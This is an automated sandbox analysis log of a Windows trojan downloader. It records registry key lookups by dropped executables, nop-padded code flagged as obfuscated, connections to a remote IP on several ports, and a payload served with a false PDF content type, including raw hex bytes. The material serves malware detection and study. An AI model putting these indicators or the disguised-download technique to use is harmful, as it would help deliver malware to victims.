Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 4x nop then jmp 05F5C903h 0_2_05F5C70E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 4x nop then jmp 05F5B00Ch 0_2_05F5AF80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 4x nop then jmp 05F5B00Ch 0_2_05F5AF70
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 4x nop then mov eax, dword ptr [ebp-28h] 5_2_05D3B1D0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 5_2_05D3BD37
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 5_2_05D3BD38
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 4x nop then jmp 00007FF7C1095746h 15_2_00007FF7C1064A58
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 4x nop then jmp 00007FF7C1075746h 23_2_00007FF7C1044A58

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 91.92.253.47 ports 39001,58001,0,1,5,8
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 05:20:16 GMT Server: Apache/2.4.57 (Debian) Last-Modified: Sat, 13 Apr 2024 09:20:23 GMT ETag: "2b2a08-615f6e5e5f7b6" Accept-Ranges: bytes Content-Length: 2828808 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: ac ec bc 8d 54 4e 3a 3f 8b 04 47 89 3f f3 60 fb cb ad a1 ea 3d a6 23 a4 35 9e ac 0d c9 df 69 f9 e0 67 7d 3b 0a 70 3b 92 94 72 80 13 57 05 03 23 7d b7 b0 bb 2e ea 36 7a c4 1e 68 9f ef 95 30 a4 73 0a 4b 94 27 7e 28 65 6e 57 61 53 1a 3c 07 8b 3a 76 bb cd a5 34 f9 4f 1f 6f 28 c3 fa b8 19 44 c4 98 6d 4c d9 c6 ac 53 b4 ea 87 27 bd 88 9b e9 5b 9e 54 9e e5 80 d9 f5 78 0e 79 99 42 01 cb 0a 5d 0d e7 81 42 10 37 ab c4 46 7c 8d 1d 5f 6b 32 65 bf 9a 80 8a f3 ab a1 a1 02 6b 33 35 de 27 6b a2 b5 85 9c 20 e3 39 e8 01 42 c9 90 1c d5 f8 2f 2b 10 32 3f 42 20 cb 7d ee 59 fb 11 c3 c0 57 ce f8 78 83 fb 3f 78 29 ee 78 49 9e 40 88 d1 b4 5f bd e1 af e8 9d 5d 57 b7 b5 3c 8c 80 1a 08 ab 78 09 73 3a b7 fd a0 b2 5c b5 12 76 a3 ae 6b 1e 70 94 3e 66 f7 9b 99 45 50 cc ac 80 65 ed e3 fb 48 6f 3f 62 9d 55 b1 d6 b5 60 49 ba 38 52 f9 27 93 26 ea 09 92 b8 74 1b 69 c0 18 57 a4 52 87 59 84 fe 50 4d 38 77 99 e6 c5 34 ac 1f bd 43 b9 ae 20 12 86 27 31 09 61 1e a4 34 1e be f3 1e 3c 8b af 24 0f 4b 4d 74 0b 5c 0a 17 43 80 17 61 0e af 64 0a 5d 75 dc 73 72 0c ad bc d4 f3 ed 6a 73 f8 fd 41 f2 10 d7 58 09 4f d6 b9 11 1e 7c 52 f4 f4 f3 97 6b 9e e7 e5 83 f2 03 0c 49 a8 22 f2 ad 4d 39 94 df d8 c3 4d 9a 4f 28 26 a9 6c f9 7a ca d1 70 24 5f d4 c3 41 4d 6c 47 cc da cf 2d 09 e9 43 f2 bc de 3f 5a 0f 9f 80 6f c5 29 46 13 09 02 31 32 0c a0 6c f6 07 16 7f 8b d3 27 55 b5 43 52 e1 e4 8e e5 e5 fe b4 2e 8b fb a3 65 e5 b1 62 1f 87 42 01 2c 1d 63 8c 1a 14 5a 8c 3a 90 83 b0 0a 4a 88 45 25 82 0b d8 67 78 44 a6 f2 8e 4d 39 cf 49 34 ac 0d 43 7c 82 6b f6 1e a7 1d 88 6a f8 20 c9 71 b9 21 da 41 6a cf 7a f8 9b a4 1f 21 c6 3c cf 1c 42 0e e1 d4 ab a3 6e de 3e 0b 0a 3b f6 e2 b3 fd 3d dc 1d a9 b2 bd e7 35 07 75 f1 2b df 84 5c 4a 35 ca 2e 65 95 b4 0e 33 34 84 6b 90 fe 0d cd 59 6a b6 e3 c0 6c b1 ed fd f2 b2 d3 93 37 70 5b 27 34 93 2b 43 e4 6c ec f0 1e 45 a6 65 20 65 08 27 37 86 8e 80 9d cc 5b e2 70 c3 34 d3 e8 13 78 bd 45 f7 83 f1 7f 14 55 fc fe d1 96 40 b5 14 84 e6 ce ac 15 9e a7 61 e9 de 17 6b 96 1a 2a 24 fa 59 49 19 c0 e9 16 3d 9e 78 ed a0 16 37 b7 6e 0d d1 8f 3b 83 41 90 dd 3d b9 5e 1a fa a2 51 4d c2 70 52 83 5e 03 35 95 90 26 a6 68 97 0d c3 19 00 18 dc 20 f8 55 bb 93 6f 51 ee 88 24 bf 4f 3a 2c d1 02 bd 41 6d 8a 5e 31 b2 ad 37 11 5a f8 e5 00 74 8d d4 af ec 69 23 48 3e 1b 31 5e 3e b2 ed a2 11 95 ba 6f 58 9c d7 20 f1 58 02 9c 78 74 d7 fb 1a ec cc fe 97 61 fd ce 25 2d ea aa fd 4e aa 47 95 e9 bb 9c bb 0a 8f 88 46 da 79 d4 cc b7 de a6 54 90 1f fe 60 83 dd 53 3a ab 21 5a f2 14 e4 b7 ab 1c 00 73 5a 39 f7 cf 39 a2 81 52 99 54 78 b4 2e 75 6a 99 93 60 1b 6c 10 f3 49 65 49 ac b7 b8 8b fd 44 95 ed 7f 86 dc 13 34 76 96 02 a7 22 9a 07 22 8e b2 90 01 7c f1 2e b5 39 4c 09 ad cc f2 4d e2 93 21 67 0c dd 7d 30 0b 07 c1 50 94 00 4d 6c 54 f6 f7 3e 9d e
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 05:20:25 GMT Server: Apache/2.4.57 (Debian) Last-Modified: Sat, 13 Apr 2024 09:20:23 GMT ETag: "2b2a08-615f6e5e5f7b6" Accept-Ranges: bytes Content-Length: 2828808 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: ac ec bc 8d 54 4e 3a 3f 8b 04 47 89 3f f3 60 fb cb ad a1 ea 3d a6 23 a4 35 9e ac 0d c9 df 69 f9 e0 67 7d 3b 0a 70 3b 92 94 72 80 13 57 05 03 23 7d b7 b0 bb 2e ea 36 7a c4 1e 68 9f ef 95 30 a4 73 0a 4b 94 27 7e 28 65 6e 57 61 53 1a 3c 07 8b 3a 76 bb cd a5 34 f9 4f 1f 6f 28 c3 fa b8 19 44 c4 98 6d 4c d9 c6 ac 53 b4 ea 87 27 bd 88 9b e9 5b 9e 54 9e e5 80 d9 f5 78 0e 79 99 42 01 cb 0a 5d 0d e7 81 42 10 37 ab c4 46 7c 8d 1d 5f 6b 32 65 bf 9a 80 8a f3 ab a1 a1 02 6b 33 35 de 27 6b a2 b5 85 9c 20 e3 39 e8 01 42 c9 90 1c d5 f8 2f 2b 10 32 3f 42 20 cb 7d ee 59 fb 11 c3 c0 57 ce f8 78 83 fb 3f 78 29 ee 78 49 9e 40 88 d1 b4 5f bd e1 af e8 9d 5d 57 b7 b5 3c 8c 80 1a 08 ab 78 09 73 3a b7 fd a0 b2 5c b5 12 76 a3 ae 6b 1e 70 94 3e 66 f7 9b 99 45 50 cc ac 80 65 ed e3 fb 48 6f 3f 62 9d 55 b1 d6 b5 60 49 ba 38 52 f9 27 93 26 ea 09 92 b8 74 1b 69 c0 18 57 a4 52 87 59 84 fe 50 4d 38 77 99 e6 c5 34 ac 1f bd 43 b9 ae 20 12 86 27 31 09 61 1e a4 34 1e be f3 1e 3c 8b af 24 0f 4b 4d 74 0b 5c 0a 17 43 80 17 61 0e af 64 0a 5d 75 dc 73 72 0c ad bc d4 f3 ed 6a 73 f8 fd 41 f2 10 d7 58 09 4f d6 b9 11 1e 7c 52 f4 f4 f3 97 6b 9e e7 e5 83 f2 03 0c 49 a8 22 f2 ad 4d 39 94 df d8 c3 4d 9a 4f 28 26 a9 6c f9 7a ca d1 70 24 5f d4 c3 41 4d 6c 47 cc da cf 2d 09 e9 43 f2 bc de 3f 5a 0f 9f 80 6f c5 29 46 13 09 02 31 32 0c a0 6c f6 07 16 7f 8b d3 27 55 b5 43 52 e1 e4 8e e5 e5 fe b4 2e 8b fb a3 65 e5 b1 62 1f 87 42 01 2c 1d 63 8c 1a 14 5a 8c 3a 90 83 b0 0a 4a 88 45 25 82 0b d8 67 78 44 a6 f2 8e 4d 39 cf 49 34 ac 0d 43 7c 82 6b f6 1e a7 1d 88 6a f8 20 c9 71 b9 21 da 41 6a cf 7a f8 9b a4 1f 21 c6 3c cf 1c 42 0e e1 d4 ab a3 6e de 3e 0b 0a 3b f6 e2 b3 fd 3d dc 1d a9 b2 bd e7 35 07 75 f1 2b df 84 5c 4a 35 ca 2e 65 95 b4 0e 33 34 84 6b 90 fe 0d cd 59 6a b6 e3 c0 6c b1 ed fd f2 b2 d3 93 37 70 5b 27 34 93 2b 43 e4 6c ec f0 1e 45 a6 65 20 65 08 27 37 86 8e 80 9d cc 5b e2 70 